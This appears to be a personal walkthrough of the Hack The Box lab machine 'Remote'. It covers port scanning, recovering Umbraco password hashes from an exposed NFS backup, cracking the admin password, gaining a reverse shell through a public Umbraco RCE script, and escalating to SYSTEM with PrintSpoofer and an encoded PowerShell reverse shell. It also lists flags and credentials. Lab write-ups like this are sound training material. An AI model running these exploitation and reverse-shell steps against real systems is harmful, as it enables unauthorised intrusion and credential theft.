Remote

NMAP

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

MORE ENUMERATION _ FUCK ME

PORT     STATE SERVICE VERSION
2049/tcp open  mountd  1-3 (RPC #100005)

Foothold

• http site is some ACME store
• has a umbraco cms login portal
  • did not find the creds for it or even a valid email id as suggested by the login portal
  • the version was also not found
• directory enum gives nothing
• running nmap scan on all ports shows 2049 open - NFS
• showmount -e 10.10.10.180
  • /site-backup directory seems to be available
  • Looking for config files, umbraco.sdf was the main thing

    strings umbraco.sdf | head -n 100                                                                      
    Administratoradmindefaulten-US
    Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
    Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
    adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
    adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
    smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
    ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
    ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
    

• hashcat -m 100 umbraco.hash rockyou.txt

  • admin@htb.local:baconandcheese

• after logging in, we see umbraco 7.12.4

  • https://github.com/noraj/Umbraco-RCE
• start nc listener
• python3 umbraco.py -u admin@htb.local -p baconandcheese -c powershell.exe -a '-e base64_payload_from_revshell'
• on nc we get shell, go to Public/Desktop for user.txt - 9930587226f28d4ec6e41ba105a44a11

PrivEsc

• running winpeas

  C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
  
  C:\Windows\Panther\Unattend.xml
  
  Some AutoLogon credentials were found
      DefaultUserName               :  Administrator
  
  PRIVILEGES INFORMATION
  ----------------------
  
  Privilege Name                Description                               State   
  ============================= ========================================= ========
  SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
  SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
  SeAuditPrivilege              Generate security audits                  Disabled
  SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
  SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
  SeCreateGlobalPrivilege       Create global objects                     Enabled 
  SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
  

• trying to exploit SeImpersonatePrivilege - using https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

• send PrintSpoofer64.exe to target
• start nc listener on 8484
• .\printspoofer -i -c 'powershell -e base64_revshell_payload'
• nc shell gives us NT AUTHORITY\SYSTEM to get root.txt - d1a6d961b35338bd17b99a42a4b324b8